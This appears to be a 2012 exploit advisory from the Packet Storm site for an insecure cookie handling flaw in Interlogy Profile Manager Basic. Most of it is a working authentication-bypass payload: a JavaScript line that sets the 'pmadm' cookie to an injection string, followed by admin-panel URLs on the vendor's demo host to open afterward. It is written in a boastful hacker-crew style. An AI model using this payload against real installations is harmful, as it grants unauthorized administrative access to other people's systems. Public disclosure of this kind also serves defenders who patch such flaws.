Interlogy Profile Manager Basic suffers from an insecure cooking handling vulnerability that can allow for authentication bypass.
392c64e2ef3471ad8a285a480383b25fe5254d311f51a5836523f4311b8a07a0[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling
Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: zer03s
[~]
[~] Date: 03/05/2012
[~]
[~] Home: zer03s.blog.com
[~]
[~] -----------------------------------------------------------
desc:
normal login for cookie
pmadm=dGVzdA;
if ý do this:
pmadm=dGVzd(write any thing);
example:
pmadm=dGVzdz;
or
pmadm=dGVzd123231212313;
not login
if ý do wthis:
pmadm=dGVzd ' or ';
boom this loggin :D
exp:
javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";
after you go here:
http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp
or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users
[~]----------------------------------------------------------------------
[~] Greetz tO: all member blackc0de
[~]----------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed